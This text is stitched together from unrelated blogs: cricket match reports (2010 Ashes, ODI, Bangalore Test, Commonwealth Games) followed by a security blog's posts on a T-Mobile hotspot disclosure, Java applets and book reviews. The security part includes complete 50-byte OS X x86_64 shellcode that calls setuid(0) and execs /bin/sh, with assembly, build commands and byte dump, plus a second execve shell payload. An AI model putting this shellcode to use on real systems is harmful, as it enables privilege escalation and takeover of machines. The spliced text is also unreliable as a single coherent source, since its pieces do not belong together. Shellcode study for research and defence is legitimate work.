Adelaide – Second Ashes Test

Day 1 – 3rd December 2010

The first day of the Second Ashes Test was another tough day at the office for the Australian batsmen. Amazingly three wickets were down within 15 minutes, on what should have been a batsmen’s wicket. Katich was run out without facing a single ball. Both Katich and Watson seemed indecisive over a dangerous run and Trott struck with a direct hit. Ricky Ponting was then dismissed off of the first ball he faced, caught by Swann off the bowling of Anderson. Clarke was dismissed for two by the same pairing.

Mike Hussey, Australia’s saviour from the First Test, came to the crease. He and Watson managed to take the score to 93 at lunch, without further loss. But Watson was dismissed almost straight after lunch for the addition of only 3 runs, caught by Pietersen, once again off of Anderson’s bowling. Hussey was joined by his Western Australian team mate Marcus North and the two of them batted well together adding 60 runs. North seemed to be seeing the ball well, but still edged a ball to Prior for Finn’s first wicket of the match. Haddin, the last of Australia’s recognised batsmen, came to the crease and together with Hussey, added another 50 runs, before Hussey was caught by Collingwood off of the spinner Swann, seven runs short of his 13th Test century.

As expected the Australian tail did not wag. Haddin hung around to be the last man dismissed for 56. But Harris, Doherty, Siddle and Bollinger managed only 9 runs between them. Australia were all out for 245. Anderson was the pick of the English bowlers, picking up 4 for 51 off of 19 overs. Swann claimed two wickets and Broad and Finn one apiece.

England had to face one over before the close of play, which they negotiated without a problem, for the addition of a single leg bye.

On this performance there will be more calls for changes in the Australian line up. It should be Ponting and Clarke that are looked at, but you can bet your life it will be Marcus North the press call for to be dropped.

Things are not looking great for Australia. This attack does not look strong to me and unless the batsmen can seriously turn things around in the second innings, this could be their first loss of the series.

First Ashes Test Day Four

England took command of the first session of day four, managing to get through the session without loss and raising the overall run rate to just under three an over, after yesterday’s very slow start. Australia only had one genuine chance of a wicket, when Strauss was dropped by the normally safe hands of Mitchell Johnson. Both Strauss and Cook made half centuries, finishing the morning on 79 and 51 at 135 for none.

After lunch things continued England’s way with centuries for both Strauss and Cook. Strauss managed 10 more runs before being stumped by Haddin off the bowling of Marcus North. But that was the only wicket of the day, with Cook remaining unbeaten on 132. He was joined by Trott on the dismissal of Strauss and he was still there on 54 when play closed early due to bad light, with England on 309 for 1 for a lead of 88.

With only one day remaining a draw now looks the most likely result. Which could be bad news for Australia as this is how the last Ashes series started in Cardiff last year. Australia dominated that match only to be held to a draw.

First Ashes Test Brisbane 2010

The first two days of the first Ashes test of 2010 saw honours fairly even, with a slight edge to Australia. On the first day good innings from Cook, Pietersen and Bell were quickly overshadowed by Peter Siddle on his 26th birthday. Siddle finished with figures of 6 for 54 off of 16 overs, which was of course crowned by his hat trick of Cook, Prior and Broad. Siddle’s bowling cannot be praised highly enough, with the debutant Xavier Doherty the only other bowler picking up more than one wicket. Doherty bowled well in his first test match, deservedly picking up the wickets of England’s highest scorer Ian Bell and number 10 Jimmy Anderson. Australia safely saw off the day’s final overs, finishing with 25 for no wickets.

Day two saw Watson and Katich both make good starts scoring 36 and 50 respectively, but Ponting and Clarke went cheaply, scoring only 10 and 9. But cometh the hour cometh the man. Mike Hussey marched to the crease under a huge cloud created by eastern states commentators and critics calling for him to be dropped. He came in with Australia starting to flounder on 3 for 100, then Clarke and North went quite quickly, to leave them on 5 for 143, still 117 behind England’s first innings score. Hussey and Haddin saw off the rest of the day’s bowling, finishing the day on 81 and 22 not out with the score on 220 for 5.

Day three saw the partnership consolidate and get through a tough period of bowling from England. They then started to make hay, with both players scoring centuries and Australia taking a grip on the contest. They batted well into the third session of the day, with Haddin eventually being dismissed for 136 after bringing up his century with a 6 straight down the field. Hussey fell agonisingly short of a double century, but with his highest test score of 195. He batted for eight and a quarter hours, scoring 26 fours and a six, so hopefully that will silence his critics for the rest of the series. The debutant Doherty scored a useful 16 being the last man dismissed by Finn, the pick of the England bowlers who finished with 6 for 125 off 33.4 overs. Australia were all out for 481 leading England by 221.

Strauss was almost dismissed off the first ball of England’s second innings, leaving a rising ball from Hilfenhaus. Aleem Dar gave him not out. Australia appealed the decision and he was proved correct with the ball going over the wicket. England finished the day without loss, but did not score many runs, in what now appears to be a battle to save the match, ending with 19 for none.

Australia Lose first ODI of the season

Sri Lanka 243-9 (44.2 ovs) beat Australia 239-8 (50 ovs) by one wicket

Australia managed to snatch a defeat from the jaws of a victory in the first one day international of this cricket season, at the MCG. Australia made 239-8 batting first. There were some disappointments but Haddin made 49 and Mike Hussey restored some respect to the score, making 71 not out. Hussey took to the field at 85 for 2 in the 17th over and batted through to the close. But he never had any partner that accompanied him for very long. He said at the close of the innings that he thought it was a below par score.

The Sri Lanka innings started well for Australia with Tharanga and Dilshan being dismissed in single figures. Sangakkara and Jayawardene put on 54 for the third wicket before a collapse that left Sri Lanka reeling on 107 for 8. Spinner Xavier Doherty took 4 wickets on his debut, but then the wheels fell off. Angelo Mathews and Malinga created a new 9th wicket record for Sri Lanka, scoring 132 runs. Malinga was only dismissed when the scores were even.

Much is being said about Australia forgetting how to win and things are looking grim for the upcoming Ashes series. We know that the days of the Invincibles are over, where someone would always stand up when the chips were down. Australia no longer has those exceptionally talented players throughout the team. But they are still a solid side and hopefully will show their pride when they face the old enemy. But it is going to be a tough uphill battle on current form.

The answer to Australia’s problems is not to drop Mike Hussey as has been suggested in some quarters. This is mainly due to him being from WA. If he was from the Eastern States nothing much would be said of his recent form. But as he is West Australian his position in the team is always under threat, according to the Eastern States press. Fortunately I believe that he has more support with the selectors and certainly from the Captain. Hussey is always likely to pull out a match saving innings like he did today. Well it would have saved the match, if the bowlers could have managed the last two wickets for anything less than 133 runs, sounds more than achievable to me.

Ricky Ponting missed the match due to a family bereavement, but will be available for the Sydney game on Friday. He has not played an ODI since the series against England finished in July. Let’s hope he can bring a change of fortunes, one is urgently required.

Commonwealth Games Wind Up

Australia tops the Medal table

So the Commonwealth Games is all over for another 4 years. Australia led the event across the board, ending up clear leaders of the medal table by a country mile. In the final days Australia won both the Men’s and Women’s Hockey Finals, but New Zealand took some comfort in beating Australia in the finals of the Rugby 7s and Netball.

One of the lesser lights of Commonwealth sport, Singapore, almost made a clean sweep of Table Tennis, picking up 6 of the 7 Golds available. Losing only the Men’s doubles final to India.

Kenya did the double in the Marathon, picking up gold in both the Men’s and Women’s events. Confirming their domination of distance running, picking up the vast majority of medals from 800 metres to the Marathon. How long will it be before we see Kenya winning the sprint events too?

India succeeded in pipping England at the post for second place in the medals table. They picked up their 38th Gold medal of the games in Badminton, where England lost 3 finals to pick up silver. England only needed to pick up one more Gold to beat India into second place, because of their superior number of Silver medals.

On Wednesday night at the Boxing finals Indian fans were cheering any fighter that was up against an Englishman, hoping to secure that second place.

It would be a very good week to be an Indian sports fan I would imagine, having beaten Australia in the second test at Bangalore on Wednesday to secure the series 2-0. Sachin Tendulkar picking up a double century in the first and 53 not out in the second innings. He of course hit the winning runs too. Australia are really going to have to put some work in before the Ashes series if they do not want to be humbled on home soil. The first Ashes test begins on 24th November.

By Max Power

India v Australia Second Test, Bangalore, day two

Australia 478 v India 128-2

The second day of the second test was most notable for Marcus North scoring his 5th test century and hopefully relieving some of the pressure on him to retain his position. North finished on 128, hitting 17 fours and a six. Ricky Ponting (77) and Tim Paine (59) had also chipped in with half centuries in Australia’s total of 478. The best of the Indian bowlers was spinner Harbhajan Singh, who took North’s wicket and finished with figures of 4-148.

Marcus North hits his highest test score and 5th test century

Sachin Tendulkar also achieved a landmark in being the first player to score 14,000 test runs. He needed only 27 runs to reach the target and finished the day on 44 not out, having hit 6 fours. Tendulkar came in after Sehwag was caught by Mitchell Johnson after scoring a rapid 30 off of 28 balls and Dravid was dismissed for a solitary run, caught at third slip by Marcus North off an edge from Mitchell Johnson. Tendulkar and Vijay then batted until the close of play, scoring an unbeaten 90 in India’s total of 128 for 2.

Sachin Tendulkar passed the milestone of 14,000 test runs in his unbeaten partnership with Vijay

T-Mobile 4G Hotspot Multiple Vulnerabilities


Create your own personal hotspot on the go with the T-Mobile 4G Mobile Hotspot—get high-speed Internet on up to five Wi-Fi devices, using a single mobile broadband connection.



  • Reported to T-Mobile and ZTE on 4/14/12.
  • Received notification from T-Mobile on 4/17/12 that the vulnerabilities would be forwarded to their security team for review.
  • Received no meaningful response from ZTE.
  • No fixes provided, disclosure 2/21/13

Device: T-Mobile 4G Mobile Hotspot ZTE MF61

The access point broadcasts as ‘T-Mobile Broadband#’ where # changes per device.


My Plea to Oracle: Axe Java Applets

Hi Oracle,

We’ve got a bit of a problem: applets.

You see, almost every recent security vulnerability and recent hack – Facebook, Apple, NYT – has been because of your support for applets.

Just to name a few, there’s CVE-2012-3213, CVE-2012-3342, CVE-2013-0351, CVE-2013-0409, CVE-2013-0419, CVE-2013-0423, CVE-2013-0424, CVE-2013-0425, CVE-2013-0426, CVE-2013-0427, CVE-2013-0428, CVE-2013-0429, CVE-2013-0432, CVE-2013-043, CVE-2013-0434, CVE-2013-0435, CVE-2013-0438, CVE-2013-0440, CVE-2013-0441, CVE-2013-0442, CVE-2013-0443, CVE-2013-0445, CVE-2013-0450, CVE-2013-1473, CVE-2013-1475, CVE-2013-1476, CVE-2013-1478, CVE-2013-1480, CVE-2013-1481, CVE-2013-1486, CVE-2013-1487, CVE-2013-1488.

I’ve been developing in Java for many years and I can attest that nobody uses applets anymore. It’s old outdated technology that needs to go away. It’s too heavy of a platform to deliver web applications. The future of web technology is light weight. The future is HTML5, Javascript, and CSS3.

We all make mistakes and nobody is going to blame you (except maybe the malware authors) for getting rid of applets.

Do it! Axe it!

Security Enthusiast and Java Developer
Dustin Schultz

Java Facepalm

It’s been a while since I’ve blogged but I couldn’t resist with the latest Java vulnerability. I saw the proof of concept code posted by jduck last night (here) and thought this looks like normal Java code to me (I develop in Java at my day job). Well it turns out…this is normal Java code!


50 Byte x86_64 OS X setuid execve Null Free Shellcode

More, smaller shellcode; this time tested and verified working on OS X 10.7.


 * Name: setuid_shell_x86_64
 * Qualities: Null-Free
 * Platforms: Mac OS X 10.7 Intel x86_64
 *  Created on: Apr 12, 2012
 *      Author: Dustin Schultz -
char shellcode[] =


; File: setuid_shell_x86_64.asm
; Author: Dustin Schultz -

section .text
global start

mov r8b, 0x02                   ; Unix class system calls = 2
shl r8, 24                      ; shift left 24 to the upper order bits
or r8, 0x17                     ; setuid = 23, or with class = 0x2000017
xor edi, edi                    ; zero out edi, uid = 0
mov rax, r8                     ; syscall number in rax
; mov rax, 0x2000017
syscall                         ; invoke kernel
add r8, 0x24                    ; 0x24+r8=0x200003b
mov rax, r8                     ; syscall number in rax
xor rdx, rdx                    ; zero out rdx, null terminator
; mov rax, 0x200003b
mov rdi, 0x68732f2f6e69622f     ; /bin//sh in hex
push rdx                        ; push backwards, null terminator
push rdi                        ; address of /bin//sh
mov rdi, rsp                    ; null terminated /bin/sh pointer
push rdx                        ; push backwards, null terminator
push rdi                        ; address of /bin//sh
mov rsi, rsp                    ; null terminated /bin/sh pointer
syscall                         ; invoke kernel

To test:

dustin@sholtz:~/$ nasm -f macho64 shell.s 
dustin@sholtz:~/$ ld -static -arch x86_64 shell.o
dustin@sholtz:~/$ ./a.out

Bytes from otool:

dustin@sholtz:~/$ otool -t a.out 
(__TEXT,__text) section
0000000100000f86 41 b0 02 49 c1 e0 18 49 83 c8 17 31 ff 4c 89 c0 
0000000100000f96 0f 05 49 83 c0 24 4c 89 c0 48 31 d2 48 bf 2f 62 
0000000100000fa6 69 6e 2f 2f 73 68 52 57 48 89 e7 52 57 48 89 e6 
0000000100000fb6 0f 05 


Execve Syscall on OSX 10.7

I’m getting some strange behavior with shellcode that used to work on OS X 10.6. I noticed that if I don’t link with the “-static” option, I get a segfault.

; File: shell.s
; Author: Dustin Schultz -

section .text
global start

xor rdx, rdx
mov eax, 0x200003b
mov rdi, 0x68732f2f6e69622f
push rsi
push rdi
mov rdi, rsp

With static:

dustin@sholtz:~$ nasm -f macho64 shell.s 
dustin@sholtz:~$ ld -static -arch x86_64 shell.o
dustin@sholtz:~$ ./a.out 
dustin@sholtz:/Users/dustin$ exit

Without static

dustin@sholtz:~$ nasm -f macho64 shell.s 
dustin@sholtz:~$ ld -arch x86_64 shell.o
dustin@sholtz:~$ ./a.out 
Segmentation fault: 11

otool has the same output:

dustin@sholtz:~$ otool -tv static 
(__TEXT,__text) section
0000000100000fe7	xorq	%rdx,%rdx
0000000100000fea	movl	$0x0200003b,%eax
0000000100000fef	movq	$0x68732f2f6e69622f,%rdi
0000000100000ff9	pushq	%rsi
0000000100000ffa	pushq	%rdi
0000000100000ffb	movq	%rsp,%rdi
0000000100000ffe	syscall
dustin@sholtz:~$ otool -tv non-static 
(__TEXT,__text) section
0000000100000f9f	xorq	%rdx,%rdx
0000000100000fa2	movl	$0x0200003b,%eax
0000000100000fa7	movq	$0x68732f2f6e69622f,%rdi
0000000100000fb1	pushq	%rsi
0000000100000fb2	pushq	%rdi
0000000100000fb3	movq	%rsp,%rdi
0000000100000fb6	syscall

The headers on the files look way different but I’m not sure exactly what is causing the issue. For instance, the non-static version has several more Load commands like LC_LOAD_DYLINKER (which is expected).

As pointed out in the comments, I was not initializing rsi correctly! Thanks for pointing that out. The fix was to add this before the last syscall:

push rdx
push rdi
mov rsi, rsp

Finding the syscall implementations in OS X

This is mainly just a little note for myself. Sometimes when I’m writing shellcode, I’m interested in how OS X implements the syscalls internally. It’s easy to find out with a command like this:

dustin@sholtz:~$ otool -tv /usr/lib/system/libsystem_kernel.dylib | grep -A10 execve
0000000000016898	movl	$0x0200017c,%eax
000000000001689d	movq	%rcx,%r10
00000000000168a0	syscall
00000000000168a2	jae	0x000168a9
00000000000168a4	jmp	0x00017ffc
00000000000168a9	ret
00000000000168aa	nop
00000000000168ab	nop
00000000000168ac	movl	$0x02000184,%eax
00000000000173e0	movl	$0x0200003b,%eax
00000000000173e5	movq	%rcx,%r10
00000000000173e8	syscall
00000000000173ea	jae	0x000173f1
00000000000173ec	jmp	0x00017ffc
00000000000173f1	ret
00000000000173f2	nop
00000000000173f3	nop
00000000000173f4	movl	$0x0200000d,%eax

This will find the execve syscall implementation. I still haven’t figured out where the parameters are getting set up, but this is definitely where the syscall number is getting moved into rax. The movq copies whatever was in rcx into r10 because rcx gets smashed when syscall is invoked.
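For reading listings like the one above, the sketch below (an added example, not code from the original post) pairs each `movl $imm,%eax` with the `syscall` that follows it and splits the immediate into the class byte and the call number, using the encoding from the shellcode comments earlier on this page (class 2 shifted left 24, OR'd with the number). The names `decode` and `find_syscalls` are hypothetical, the name table holds only the two numbers this page identifies, and the sample lines are copied from the otool output quoted in the post.

```python
import re

SYSCALL_NUMBER_MASK = 0x00FFFFFF   # low 24 bits carry the call number
UNIX_CLASS = 2                     # "Unix class system calls = 2" (from the page)

# Only the two numbers this page names; everything else is reported unnamed.
KNOWN_UNIX = {0x17: "setuid", 0x3B: "execve"}

# otool -tv line shapes: "<address>  movl  $0x...,%eax" and "<address>  syscall"
MOV_EAX = re.compile(r"^\s*([0-9a-f]+)\s+movl\s+\$0x([0-9a-f]+),\s*%eax\s*$", re.I)
SYSCALL = re.compile(r"^\s*[0-9a-f]+\s+syscall\s*$", re.I)


def decode(raw):
    """Split a raw syscall value into (class, number, name or None)."""
    cls = raw >> 24
    num = raw & SYSCALL_NUMBER_MASK
    name = KNOWN_UNIX.get(num) if cls == UNIX_CLASS else None
    return cls, num, name


def find_syscalls(listing):
    """Return (mov_address, class, number, name) for every syscall that is
    preceded by an immediate load into eax. A load that is replaced by a
    later load, or never reaches a syscall, is not reported."""
    found = []
    pending = None
    for line in listing.splitlines():
        m = MOV_EAX.match(line)
        if m:
            pending = (int(m.group(1), 16), int(m.group(2), 16))
        elif SYSCALL.match(line) and pending is not None:
            addr, raw = pending
            found.append((addr,) + decode(raw))
            pending = None
    return found


# Lines taken from the grep'd otool listing in the post (tabs shown as spaces).
SAMPLE = """\
0000000000016898  movl  $0x0200017c,%eax
000000000001689d  movq  %rcx,%r10
00000000000168a0  syscall
00000000000168a2  jae   0x000168a9
00000000000168ac  movl  $0x02000184,%eax
00000000000173e0  movl  $0x0200003b,%eax
00000000000173e5  movq  %rcx,%r10
00000000000173e8  syscall
00000000000173f4  movl  $0x0200000d,%eax
"""

if __name__ == "__main__":
    for addr, cls, num, name in find_syscalls(SAMPLE):
        print(f"{addr:#x}: class={cls} number={num} ({name or 'not named on this page'})")
```

The two loads that grep's `-A10` window cut off before their `syscall` (0x02000184 and 0x0200000d) are dropped rather than guessed at.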

Book Review: Practical Malware Analysis

I’ve been dying to get this review out for a while now. There’s so much good and deep content in this book, that reading it on nights after work and weekends took longer than expected! I’ll tell you now that if you’re into computers and computer security, this book won’t let you down. This book is like having your very own personal malware analysis teacher without the expensive training costs.

About the Book

The book material is exhaustingly complete with 21 chapters + appendices covering everything from static analysis, environment setup, x86 assembly to anti-disassembly and anti-virtual machine practices. Total book content, minus lab solutions, comes in at an enormous 475 pages (with lab solutions, 732 pages). Let’s just say that you better be prepared to eat, breathe, and live malware analysis for quite some time. The skill level for the book is targeted at someone with experience in programming and security although an ambitious beginner should do fine.

Half way through Practical Malware Analysis

I’m about half way through Practical Malware Analysis and let me just say … this book is awesome! Quote me on this: I guarantee this book will go down in history as one of the best in its class. Look out for my full review!

Book Review: Hacking and Securing iOS Applications

About the Book

Hacking and Securing iOS Applications is a recently released book by Jonathan Zdziarski. This book is aimed to teach you how to

  • Compromise an iOS device
  • Steal the filesystem of an iOS device
  • Abuse the Objective-C runtime
  • Defeat iOS built in encryption
  • Protect your own applications

and much, much, more! The book comes in at just shy of 400 pages. Each chapter is broken into a specific topic and builds on previous chapters. However, there are a few chapters which are self contained and could be read without prior knowledge (e.g. Chapter 13 – Jailbreak Detection).

Audience, Skill Level, & Prereqs

This book is targeted at app developers and the how-does-ios-work-and-how-can-I-manipulate-it type person (I try not to use the term “Hacker”). Jonathan also uses the term tinkers – I like that one too!
